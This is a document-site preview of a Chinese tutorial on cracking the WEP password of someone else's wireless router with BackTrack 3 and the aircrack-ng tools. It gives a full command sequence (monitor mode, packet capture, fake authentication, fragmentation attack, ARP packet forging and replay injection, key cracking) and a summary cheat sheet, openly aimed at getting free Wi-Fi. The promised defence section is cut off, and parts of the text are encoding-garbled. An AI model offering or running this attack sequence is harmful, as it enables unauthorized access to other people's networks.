教你用筆記本破解無線路由器密碼_第1頁
教你用筆記本破解無線路由器密碼_第2頁
教你用筆記本破解無線路由器密碼_第3頁
教你用筆記本破解無線路由器密碼_第4頁
教你用筆記本破解無線路由器密碼_第5頁
已閱讀5頁,還剩18頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)

文檔簡介

1、教你用筆記本破解無線路由器密碼 收藏 最近很多人問我怎么破解WiFi密碼看來大家都對免費(fèi)的東西比較有興趣。要么也可能是我太招搖了囧好吧,我就寫篇小小的教程,看完后,你應(yīng)該能夠破解大部分無線路由器密碼了,寫這個教程也是為了加強(qiáng)大家對無線網(wǎng)絡(luò)安全性的重視,后面也有簡單的防破解的辦法。 好了,正式開始。首先,你需要的工具:軟件:     BackTrack 3(簡稱BT3)BT3有光盤版,硬盤版還有U盤版,由于本本基本上可以刻碟,我就懶得弄那些U盤版,硬盤版了,直接刻了張碟,所以這篇教程使用光盤版。下載地址:U盤版:http:/backtrack.u

2、/bt3final_usb.iso光盤版:/cgi-bin/fileget?version=bt3-cd  硬件:     一臺筆記本,或者臺式機(jī)配無線網(wǎng)卡。如果是筆記本,在設(shè)備管理器中查看一下你的網(wǎng)卡類型,我的是Intel 3945ABG的,現(xiàn)在市面上大部分筆記本都是用的這個網(wǎng)卡,所以,這篇教程主要針對這個網(wǎng)卡,如果不是,可能也能夠破解成功,我也就沒有測試了,臺式機(jī)用的無線網(wǎng)卡同理,也有支持BT3的。  圖01-查看網(wǎng)卡  

3、    其余瓜子,飲料什么的自備。 關(guān)于前面的準(zhǔn)備部分,網(wǎng)上很多教程都解釋得很詳細(xì)了,我也沒做過關(guān)于U盤版或者硬盤版,所以這部分跳過有問題的在下面留言。 插入光盤開機(jī)等待幾分鐘,有個選擇模式的界面,一般選擇第一個就會進(jìn)入BT3的圖形界面,如圖02,如果不能進(jìn)去,輸入賬號root,密碼toor,然后輸入startx,也可以進(jìn)去,但是我測試過,我的本本進(jìn)不去,網(wǎng)上找到的答案是顯卡不支持(ATI 2400 XT)進(jìn)不去第一個的嘗試選擇第四個圖形模式,我的可以進(jìn)去,如果這個也進(jìn)不去,那就每個圖形模式都試試,都不行的話,那就是RP問題了,你的本本顯卡不支

4、持 圖02-進(jìn)入后界面 然后點(diǎn)右下角的一個黑黑的顯示器一樣的圖標(biāo)打開一個控制臺,如圖03:  圖03-打開控制臺這時候可以開始輸入命令了。  ifconfig -a這是查看當(dāng)前網(wǎng)卡信息的,-a是顯示全部網(wǎng)卡,如果沒有這個參數(shù),就無法顯示出無線網(wǎng)卡。這條命令可以查看當(dāng)前網(wǎng)卡的MAC地址,其中,無線網(wǎng)卡的MAC地址是我們需要的,就在HWaddr后面的6個16進(jìn)制字符,后面的那么多00是不要的,應(yīng)該是為了IP6做準(zhǔn)備的。如圖04。 圖04-查看網(wǎng)卡信息 為了避免信息泄露,我把我的MAC地址和要破解的AP(Access Point,

5、接入點(diǎn))的MAC地址的后2個字節(jié)都隱藏了呵呵可以看到,現(xiàn)在的無線網(wǎng)卡名稱是wlan0,這是BT3自動加載的iwl3945驅(qū)動起的名字,而這個驅(qū)動是不支持之后的破解工作的,所以我們需要換個驅(qū)動。   modprobe -r iwl3945卸載當(dāng)前iwl3945驅(qū)動。   modprobe ipwraw加載ipwraw驅(qū)動,這個驅(qū)動是可以正常使用的。加載之后再輸入ifconfig a試試,就會發(fā)現(xiàn)wlan0不見了,出來了個wifi0,如圖05,這就是ipwraw給我們的網(wǎng)卡起的名字。這個名字之后會多次用到。這時候也需要把自己的MAC地址記住,最好是在桌面新建

6、一個文本文件,然后復(fù)制進(jìn)去,方便之后的命令調(diào)用。 圖05-加載3945驅(qū)動   airomon-ng start wifi0這條命令是設(shè)置無線網(wǎng)卡為監(jiān)聽模式,因?yàn)閃indows下這個很難實(shí)現(xiàn),而Linux由于開源,所以大部分黑客軟件都是Linux平臺下的,我剛開始用BT3的時候就因?yàn)閕wl3945驅(qū)動不能使用監(jiān)聽模式而卡在這里了。設(shè)置成功后,如圖06。 圖06-設(shè)置監(jiān)聽模式   airodump-ng wifi0既然要破解,那么總得有目標(biāo)吧,這條命令就是檢測當(dāng)前所能搜索到的所有無線網(wǎng)絡(luò)信號。其中包括頻道,信號強(qiáng)度等信息。運(yùn)行后如圖07

7、。 圖07-查看存在AP 里面的幾個參數(shù),解釋一下,網(wǎng)上也有解釋的,但是解釋得不太清楚。BSSID這個就是路由器的MAC地址了,我要破解的是下面那個,上面那個信號太差。PWR這個是信號強(qiáng)度,但是我的電腦顯示不出來,顯示不出來也沒關(guān)系,不妨礙之后的破解的,只要在Windows中顯示信號很好就可以了。Beacons這個是路由器對外發(fā)包,可能是SSID廣播,我也不太清楚,如果看到這個數(shù)據(jù)在漲,就代表這個AP還行,一般是1秒漲2030吧。太慢了就有可能因?yàn)樾盘柕脑蚱平馐 ?Data這個數(shù)據(jù)最最重要,這個代表可以用于破解的包,一般這個數(shù)據(jù)到達(dá)1W+,一般的64位的WEP密碼就能夠

8、破解了。之后我們要做的,就是等待他到達(dá)1W,如果數(shù)據(jù)增長很緩慢(幾分鐘才增加1),那就只好用另一種方法了,就是發(fā)包攻擊,這個在后面有介紹。#/sDATA增加的速度。CH頻道,總共有11個頻道,可以看到,我要破解的AP的頻道是11。MB無線的速度,現(xiàn)在一般都是54MB的了。CIPHER加密方式,如果是WEP,就能夠用這樣的方式破解,如果是WPA/WPA2,目前就只能暴力破解了,話說我現(xiàn)在還不知道怎么暴力破解等你破解出來的密碼都是12345,1234567890之類的密碼時,你就會覺得自己付出的和得到的完全不成比例TAT。在這里我們只考慮WEP加密的情況。AUTH這個應(yīng)該是authorizatio

9、n的縮寫,也就是授權(quán)的意思,我也不明白這個有什么用??赡苈酚善饕o客戶端發(fā)包,就需要驗(yàn)證客戶端權(quán)限?,F(xiàn)在這里是空的,之后會有值的。ESSID簡單理解,這個就是路由器的名字了。這一步,我們要做的就是確定需要破解的路由器和它的MAC地址,DATA值增長速度比較快,或者在Windows下信號比較好,或者PWR比較高的,優(yōu)先。同樣,可以把MAC地址寫到文本文件中去。   airodump-ng -ivs -w god -c 11 wifi0這個命令是檢測某個頻道的路由器發(fā)包,并且保存可用包(也就是#DATA)到一個文件god,這個god是可以改成你喜歡的名字的,但是自己要記住參數(shù)中

10、,-c是指頻道,后面跟著我要破解的路由器的信號頻道,也就是11。wifi0是我的網(wǎng)卡名稱。輸入完這個命令后,這個窗口就不用關(guān)了,它要一直抓包的,我們稱之為1號窗口。 這時候我們重新打開一個控制臺,也就是黑框框。輸入之后的命令:  aireplay-ng -1 0 -a 00:23:CD:89:*:* -h 00-1F-3C-5B-*-* wifi0-a后面跟著的是目標(biāo)MAC地址。-h后面跟著的是本機(jī)的無線網(wǎng)卡MAC地址。wifi0是本機(jī)無線網(wǎng)卡名稱 這條命令是獲取授權(quán),測試模擬發(fā)包攻擊,具體有什么用,我不太清楚 可能是測試能否通過發(fā)包進(jìn)行攻擊吧。成功后會出現(xiàn)如下信

11、息:Association successful :-)然后上面那個窗口中AUTH欄值變成OPN。 圖08-測試連接   aireplay-ng -5 -b 00:23:CD:89:*:* -h 00-1F-3C-5B-*-* wifi0參數(shù)中-5是aireplay這個程序使用的模式,無需深究。-b后面跟著的是目標(biāo)MAC地址。-h后面跟著的是本機(jī)的無線網(wǎng)卡MAC地址。wifi0是本機(jī)無線網(wǎng)卡名稱 這個命令,我的理解是是獲取到一個特定的包制作攻擊源,然后可以用這個攻擊源進(jìn)行發(fā)包攻擊。這一步是最難成功的,往往失敗就是因?yàn)檫@一步。如果你選擇的AP等了半天DAT

12、A值還是0,可以放棄那個了。輸入命令后,就開始抓包了,下面的數(shù)據(jù)會漲,如圖09,等抓到一個有用的包的時候,它會問你是否用這個包,如圖10,按Y,然后回車就OK。但是往往獲取到的包都是攻擊失敗的,如圖11,這樣就只好繼續(xù)等了,它會自動開始下一輪抓包的,所以,破解也是需要RP的RP低的兄弟姐妹還是飄走吧 圖09-獲取可用包  圖10-獲取到可用包  圖11-攻擊失敗 再說說DATA值為什么會保持在0或者增長緩慢。如果這個AP是有客戶端無線連接的,那么它發(fā)的數(shù)據(jù)就多,獲取到可用包的幾率就大。如果沒客戶端連接,它做的工作就是不斷向外發(fā)送SSI

13、D廣播,簡單說就是告訴大家,我是一個路由器,我的名字是*,我的信號有多大,我有沒有密碼等等。這樣的包,可用來破解密碼的(也就是DATA包)是鳳毛麟角啊,一般5000個包能出一個都算不錯了 在等待的過程中,可以打開另一個窗口,輸入第9條命令  aircrack-ng -b 00:23:CD:89:*:* god-01.ivs參數(shù)中-b后面跟著的是目標(biāo)MAC地址。 這個就是正式破解了,其中g(shù)od-01.ivs是我們抓的數(shù)據(jù)包,也就是DATA包保存成的文件,如果你多次使用airodump抓包,那么你可以去root目錄看看最新生成的文件名,然后相應(yīng)變更。這個程序就用這些抓

14、到的DATA包來計(jì)算出密碼。運(yùn)行命令后如圖12。 圖12-嘗試破解失敗 可以看到破解失敗了。只有34個IVs(DATA包),不失敗才怪呢,之前說過一般要1W+才可以的。第2個窗口中,等啊等,終于等到一個有用的包了,成功信息如圖13 圖13-獲取到可用于攻擊的包 成功后程序會生成一個xor文件fragment-0806-150830.xor,記住這個就好,下一條命令要用。接著輸入:  packetforge-ng -0 -a 00:23:CD:89:*:* -h 00-1F-3C-5B-*-* -k 55 l 255.2

15、55.255.255 -y fragment-0806-150830.xor -w moon參數(shù)中-a后面跟著的是目標(biāo)MAC地址。-h后面跟著本地?zé)o線網(wǎng)卡MAC地址。-y是上一步中生成的那個xor文件-w是生成的ARP包文件名,我填了moon,可更改,也要記住。 這個命令是偽造ARP包,用于ARP攻擊。 最后一條命令,就讓路由器做臨死前的掙扎吧?  aireplay-ng -2 -r moon -x 512 wifi0moon是上一步保存的ARP包文件名。512是攻擊線程,一般512夠了,1024我怕大了,沒敢弄。wifi0是網(wǎng)卡名稱。 輸入完這一條,就

16、可以看到第1個窗口中的DATA值暴增,如圖14。 圖14-發(fā)包攻擊 圖上可以看到,DATA的增長速度是361個/s。然后我們就切換到第3個窗口,就是aircrack那個窗口看看吧,等DATA到了5000,就會自動開始 破解,如果沒成功,DATA到達(dá)10000又會破解一次。這一切都發(fā)生地很迅速。 很快,密碼出來了,如圖15。 圖15-破解成功 從圖15可以看到,密碼就是8264287788。由于WEP中64位加密是5個ASCII碼或者10個16進(jìn)制字符,所以,我們可以切換Windows,然后用8264287788連接上去,如圖16,信號很好哦!&

17、#160;圖16-無線連接 【總結(jié)】把所有用到的命令都總結(jié)一下,內(nèi)的是需要更改的,方便大家對照修改。  ifconfig a  modprobe -r iwl3945  modprobe ipwraw  airomon-ng start 網(wǎng)卡名  airodump-ng 網(wǎng)卡名  airodump-ng -ivs -w DATA包文件名 -c 頻道 網(wǎng)卡名  aireplay-ng -1 0 -a 目標(biāo)MAC -h 網(wǎng)卡MAC 網(wǎng)卡名  aireplay-ng -5 -b 目標(biāo)MAC -h 網(wǎng)卡MAC 網(wǎng)

18、卡名  aircrack-ng -b 目標(biāo)MAC DATA包文件名-0*.ivs  packetforge-ng -0 -a 目標(biāo)MAC -h 網(wǎng)卡MAC -k 55 l 55 -y 上一步的xor文件名 -w 攻擊包文件名?  aireplay-ng -2 -r 攻擊包文件名 -x 攻擊線程 網(wǎng)卡名 在本教程中:網(wǎng)卡名 wifi0DATA包文件名god頻道11目標(biāo)MAC00:23:CD:89:*:*網(wǎng)卡MAC00-1F-3C-5B-*-*上一步的xor文件名fragment-0806-150830.xor攻擊包文件名moon攻擊線程512 然后說說怎么樣防范自己的AP

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論